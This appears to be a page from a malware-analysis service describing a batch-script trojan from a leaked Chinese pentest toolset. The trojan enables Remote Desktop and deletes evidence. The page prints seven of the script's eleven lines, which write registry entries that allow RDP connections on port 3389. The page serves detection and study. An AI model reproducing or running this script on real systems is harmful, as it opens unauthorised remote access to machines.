Hostile 92% Download

Trojan.WinREG.Teserv.a

Enables RDP, deletes evidence

Script from disclosed CN Honker Pentest Toolset - file 3389.bat
SHA-256c9f23dcec62b17a5c7ca9cdbf042fe8374b85c93192b690839e528e1281b2326
MaleculeTh

Evidence

Script from disclosed CN Honker Pentest Toolset - file 3389.bat lines 1–11
1echo Windows Registry Editor Version 5.00>>3389.reg
2echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
3echo "fDenyTSConnections"=dword:00000000>>3389.reg
4echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
5echo "PortNumber"=dword:00000d3d>>3389.reg
6echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
7echo "PortNumber"=dword:00000d3d>>3389.reg
⋯4 lines

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.